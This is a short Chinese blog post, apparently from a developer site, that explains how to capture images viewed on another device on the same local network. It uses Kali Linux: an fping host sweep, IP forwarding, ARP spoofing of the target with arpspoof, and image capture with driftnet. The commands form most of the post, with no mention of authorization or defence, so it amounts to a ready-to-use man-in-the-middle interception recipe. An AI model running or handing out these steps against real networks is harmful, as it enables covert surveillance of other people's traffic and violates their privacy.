kali获取同局域网设备的图片信息

本文介绍如何在局域网环境下通过Kali Linux的arpspoof与driftnet工具实现对指定设备上图片的拦截与获取。具体步骤包括确认攻击双方处于同一局域网、设置流量转发、实施ARP欺骗以及利用driftnet捕获图片。

工作需求中,要进行同局域网中指定设备上的图片获取。在kali中,已经集成好了arpspoof和driftnet,用这两者完成需求。过程步骤与网上其他博客想类似,在这里仅记录归纳,如下:
1.确保攻击者与被攻击者均在同一局域网段内,这是前提:
使用命令:

ifconfig

查看当前ip所属网段,并使用:

route -n

查看当前网关。

接下来:

fping -ags 192.168.1.0/24

查看同局域网的ip,进行目标的选取。

2.使用命令进行流量转发:

echo 1 >/proc/sys/net/ipv4/ip_forward

3.进行arp攻击:

arpspoof -i wlan0 -t 网关 目标ip

4.进行driftnet进行图片的获取:

driftnet -i wlan0

目标进行网页的刷新即可获取图片。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值